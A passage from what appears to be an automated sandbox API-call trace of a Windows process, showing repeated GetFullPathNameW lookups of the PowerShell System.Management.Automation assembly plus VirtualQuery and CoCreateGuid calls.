lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.501] VirtualQuery (in: lpAddress=0x16b760, lpBuffer=0x16c620, dwLength=0x30 | out: lpBuffer=0x16c620*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.501] VirtualQuery (in: lpAddress=0x16b7f0, lpBuffer=0x16c6b0, dwLength=0x30 | out: lpBuffer=0x16c6b0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.501] VirtualQuery (in: lpAddress=0x16ba10, lpBuffer=0x16c8d0, dwLength=0x30 | out: lpBuffer=0x16c8d0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0091.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.502] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x1e14b2bd, Data2=0xa3a9, Data3=0x4e2d, Data4=([0]=0xa2, [1]=0x45, [2]=0xe6, [3]=0x19, [4]=0x39, [5]=0xd3, [6]=0x6a, [7]=0x4d))) returned 0x0 [0091.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.503] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xfbb7b82e, Data2=0x43c4, Data3=0x44b4, Data4=([0]=0x8e, [1]=0xf7, [2]=0x15, [3]=0xb5, [4]=0x99, [5]=0x7f, [6]=0x71, [7]=0x35))) returned 0x0 [0091.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.504] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x2d18d532, Data2=0xf71a, Data3=0x4567, Data4=([0]=0x87, [1]=0x35, [2]=0x51, [3]=0xfd, [4]=0x2c, [5]=0xf0, [6]=0x27, [7]=0x63))) returned 0x0 [0091.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.505] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x788302c, Data2=0x88fa, Data3=0x40da, Data4=([0]=0xbb, [1]=0xcf, [2]=0x7e, [3]=0x6b, [4]=0xfe, [5]=0xef, [6]=0xb, [7]=0xe2))) returned 0x0 [0091.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.506] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x69d6deb0, Data2=0xd4d2, Data3=0x4c6d, Data4=([0]=0xb5, [1]=0x25, [2]=0xe1, [3]=0x57, [4]=0x4d, [5]=0x5c, [6]=0x3, [7]=0xf1))) returned 0x0 [0091.507] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0x9e412d2e, Data2=0x184e, Data3=0x46ae, Data4=([0]=0xa3, [1]=0xaf, [2]=0xda, [3]=0xe4, [4]=0xea, [5]=0xbe, [6]=0x7, [7]=0x78))) returned 0x0 [0091.507] CoCreateGuid (in: pguid=0x16d750 | out: pguid=0x16d750*(Data1=0xaf9dfdc7, Data2=0xf253, Data3=0x4233, Data4=([0]=0x98, [1]=0xe1, [2]=0x92, [3]=0x2a, [4]=0x4c, [5]=0xfd, [6]=0x72, [7]=0x74))) returned 0x0 [0091.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0091.507] GetFullPathNameW (in: 